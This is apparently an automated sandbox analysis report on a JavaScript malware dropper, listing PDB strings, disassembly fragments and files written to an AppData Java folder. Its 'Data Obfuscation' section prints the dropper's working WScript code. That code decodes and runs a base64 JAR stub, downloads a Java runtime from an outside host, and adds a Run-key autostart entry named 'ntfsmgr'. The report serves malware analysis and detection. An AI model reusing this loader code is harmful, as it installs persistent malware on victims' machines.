Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\jre-image\bin\javaws.pdb8 source: xcopy.exe, 00000012.00000003.1809259600.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsoundds\jsoundds.pdb source: xcopy.exe, 00000012.00000003.1830851793.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: work\38\s\\binaries\x86ret\bin\i386\\msvcp140_1.i386.pdb source: xcopy.exe, 00000012.00000003.1833916829.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libdt_socket\dt_socket.pdb source: xcopy.exe, 00000012.00000003.1791025674.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libmanagement\management.pdb&& source: xcopy.exe, 00000012.00000003.1832702823.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: xcopy.exe, 00000012.00000003.1835216977.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsound\jsound.pdb## source: xcopy.exe, 00000012.00000003.1830592502.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: xcopy.exe, 00000012.00000003.1837580580.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjava\java.pdb source: xcopy.exe, 00000012.00000003.1807146434.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\npjp2\obj\npjp2.pdbEE, source: xcopy.exe, 00000012.00000003.1849708734.00000000022A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libinstrument\instrument.pdb source: xcopy.exe, 00000012.00000003.1800789356.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjpeg\jpeg.pdb source: xcopy.exe, 00000012.00000003.1830214634.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Win10\Desktop\RetriveTitle_vb2010\Release\TitleWindow.pdb source: javaw.exe, 00000001.00000002.2965408345.000000006EEF8000.00000002.00000001.01000000.0000000A.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009D95000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\jp2iexp\obj\jp2iexp.pdbKK5 source: xcopy.exe, 00000012.00000003.1828354060.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: xcopy.exe, 00000012.00000003.1831821826.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnet\net.pdb source: xcopy.exe, 00000012.00000003.1834640505.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libnio\nio.pdb'' source: xcopy.exe, 00000012.00000003.1834933106.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libjsound\jsound.pdb source: xcopy.exe, 00000012.00000003.1830592502.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\javaw_objs\javaw.pdb source: xcopy.exe, 00000012.00000003.1809046040.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libmanagement\management.pdb source: xcopy.exe, 00000012.00000003.1832702823.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\jre-image\bin\javaws.pdb source: xcopy.exe, 00000012.00000003.1809259600.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\libmlib_image\mlib_image.pdbMM source: xcopy.exe, 00000012.00000003.1833250324.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\eula\obj\eula.pdb source: xcopy.exe, 00000012.00000003.1791314402.000000000229E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdbP8PP@Y source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.CreateObject("WScript.Shell");var tempdir = wshShell.ExpandEnvironmentStrings("%temp%");var appdatadir = wshShell.ExpandEnvironmentStrings("%appdata%");var r = Math.random().toString(36).replace(/[^a-z]+/g, '').substr(0, 10);var stubpath = appdatadir + "\\" + r + ".txt"var decoded = decodeBase64(longText);writeBytes(stubpath, decoded);var fso = WScript.CreateObject("Scripting.FileSystemObject");var text = "";try{text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\CurrentVersion");text = wshShell.RegRead("HKLM\\SOFTWARE\\Wow6432Node\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome");}catch(err){}try{if(text == ""){text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\CurrentVersion");text = wshShell.RegRead("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\" + text + "\\JavaHome");if(text != ""){text = text + "\\bin\\javaw.exe";}}else{text = text + "\\bin\\javaw.exe";}}catch(err){}try{if(text != ""){//wshShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntfsmgr", "\"" + text + "\" -jar \"" + stubpath + "\"", "REG_SZ");wshShell.run("\"" + text + "\" -jar \"" + stubpath + "\"");} else{GrabJreFromNet();}} catch(err){}function GrabJreFromNet(){do{try{var xHttp = WScript.CreateObject("msxml2.serverxmlhttp.6.0");var bStrm = WScript.CreateObject("Adodb.Stream");xHttp.open("GET", "http://wshsoft.company/jv/jrex.zip", false);xHttp.setOption(2, 13056);xHttp.send();bStrm.Type = 1;bStrm.open();bStrm.write(xHttp.responseBody);bStrm.savetofile(appdatadir + "\\jre.zip", 2);break;}catch(err){WScript.Sleep(5000);}}while(true);UnZip(appdatadir + "\\jre.zip", appdatadir + "\\jre7");//wshShell.RegWrite("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\CurrentVersion", "1.8", "REG_SZ");//wshShell.RegWrite("HKLM\\SOFTWARE\\JavaSoft\\Java Runtime Environment\\1.8\\JavaHome", appdatadir + "\\jre7", 
"REG_SZ");wshShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ntfsmgr", "\"" + appdatadir + "\\jre7\\bin\\javaw.exe\" -jar " + "\"" + stubpath + "\"", "REG_SZ");wshShell.run("\"" + appdatadir + "\\jre7\\bin\\javaw.exe\" -jar " + "\"" + stubpath + "\"");}function decodeBase64(base64){var DM = WScript.CreateObject("Microsoft.XMLDOM");var EL = DM.createElement("tmp");EL.dataType = "bin.base64";EL.text = base64;return EL.nodeTypedValue;}function writeBytes(file, bytes){var binaryStream = WScript.CreateObject("ADODB.Stream");binaryStream.Type = 1;binaryStream.Open();binaryStream.Write(bytes);binaryStream.SaveToFile(file, 2);}function UnZip(zipfile, ExtractTo){if(fso.GetExtensionName(zipfile) == "zip"){if(!fso.FolderExists(ExtractTo)){fso.CreateFolder(ExtractTo);}var objShell = WScript.CreateObject("Shell.Application");var destination = objShell.NameSpace(ExtractTo);var zip_content = objShell.NameSpace(zipfile).Items(); for(i = 0; i < zip_content.Count; i++){if(fso.FileExists(fso.Buildpath(ExtractTo,zip_content.item(i).name)+"."+fso.getExtensionName
Source: msvcp140.dll.18.dr Static PE information: 0xEDEDFA22 [Fri Jun 29 08:17:38 2096 UTC]
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_6EEF45FB LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_6EEF45FB
Source: gcahfpmhcn.js String : entropy: 5.54, length: 1028756, content: 'dmFy{2}G5lbTQ0Ow0KdmFy{2}GxvbmdUZX{0}0{2}D0g{2}lVFc0{1}CQlEtPCNDLTwjZ0ktPCNMcGVqbGctPCMtPCMtPCMtPCM
Source: unpack200.exe.18.dr Static PE information: section name: .00cfg
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_6EEF2E75 push ecx; ret 1_2_6EEF2E88
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_020D8A11 push cs; retf 1_2_020D8A31
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_020DD7EC push es; retn 0001h 1_2_020DD8FF
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_020E2848 push es; retn 0024h 1_2_020E284B
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_020DD86F push es; retn 0001h 1_2_020DD8FF
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0203D8F7 push 00000000h; mov dword ptr [esp], esp 1_2_0203D921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0203A20A push ecx; ret 1_2_0203A21A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0203A21B push ecx; ret 1_2_0203A225
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0203BB67 push 00000000h; mov dword ptr [esp], esp 1_2_0203BB8D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0203B3B7 push 00000000h; mov dword ptr [esp], esp 1_2_0203B3DD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0203D8E0 push 00000000h; mov dword ptr [esp], esp 1_2_0203D921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0203B947 push 00000000h; mov dword ptr [esp], esp 1_2_0203B96D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_0203C477 push 00000000h; mov dword ptr [esp], esp 1_2_0203C49D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 4_3_1524A5AC pushad ; iretd 4_3_1524A5AD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 4_3_1524DE91 push ss; iretd 4_3_1524DE96
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 4_2_0276BE7B push cs; retf 4_2_0276BEF1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 4_2_0276BDDD push ebx; retf 4_2_0276BE7A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 4_2_0276BDD8 push ebx; retf 4_2_0276BE7A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 4_2_026CD8F7 push 00000000h; mov dword ptr [esp], esp 4_2_026CD921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 4_2_026CA20A push ecx; ret 4_2_026CA21A
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 4_2_026CA21B push ecx; ret 4_2_026CA225
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 4_2_026CBB67 push 00000000h; mov dword ptr [esp], esp 4_2_026CBB8D
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 4_2_026CB3B7 push 00000000h; mov dword ptr [esp], esp 4_2_026CB3DD
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 4_2_026CD8E0 push 00000000h; mov dword ptr [esp], esp 4_2_026CD921
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 4_2_026CB947 push 00000000h; mov dword ptr [esp], esp 4_2_026CB96D
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-namedpipe-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exe
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exe
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-errorhandling-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exe
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exe
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exe
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\awt.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exe
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-multibyte-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-localization-l1-2-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_1.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-2-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\sunec.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exe
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\java.exe
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-string-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-2-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exe
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\verify.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe File created: C:\Users\user\AppData\Local\Temp\Windows197633722729995093.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\management.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-util-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\zip.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-private-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_2.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\client\jvm.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exe
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exe
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\java.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jawt.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\vcruntime140.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\net.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2gss.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\vcruntime140.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\sspi_bridge.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\ucrtbase.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l2-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exe
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exe
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-2-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\msvcp140.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exe
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-process-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processenvironment-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exe
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dll
